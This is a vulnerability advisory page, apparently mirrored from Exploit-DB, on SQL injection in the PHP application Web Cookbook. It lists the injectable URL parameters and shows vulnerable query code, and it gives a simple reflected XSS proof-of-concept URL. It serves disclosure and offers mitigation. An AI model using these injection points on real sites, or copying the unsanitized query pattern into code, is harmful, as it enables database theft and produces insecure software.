header-logo
Suggest Exploit
vendor:
Web Cookbook
by:
Saadat Ullah
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Web Cookbook
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.2.15 (Centos) PHP/5.3.3
2013

Web Cookbook Multiple SQL Injection

Web Cookbook is vulnerable to multiple SQL Injection vulnerabilities. The application does not properly sanitize user-supplied input before using it in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerabilities are located in the 'searchrecipe.php' and 'showtext.php' scripts when processing the 'sstring', 'mode', 'title', 'prefix', 'preparation', 'postfix', 'tipp' and 'ingredient' parameters. An attacker can exploit these vulnerabilities to inject arbitrary SQL code to manipulate SQL queries and disclose sensitive information from the database. Additionally, the application is also vulnerable to a simple non-persistent XSS vulnerability when processing the 'sstring' parameter.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL queries. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
	initDB();
	echo "<div class=\"rdisplay\">\n";
	$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
	$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
	$title = $_GET['title'];
	$prefix = $_GET['prefix'];
	$preparation = $_GET['preparation'];
	$postfix = $_GET['postfix'];
	$tipp = $_GET['tipp'];
	$ingredient = $_GET['ingredient'];
	.
	.
	.
	if ($title != "") {
		$sstring = "a.title LIKE '%$title%' ";
	}
	.
	.
	searchRecipe($mode, $sstring);
	.
	.
	In Function SearchRecipe
				$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
		if ($sstring != "") {
			searchRecipe(0, $sstring);
.
.
.
	$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher

Navigation

Suggest Exploit

Services By CQR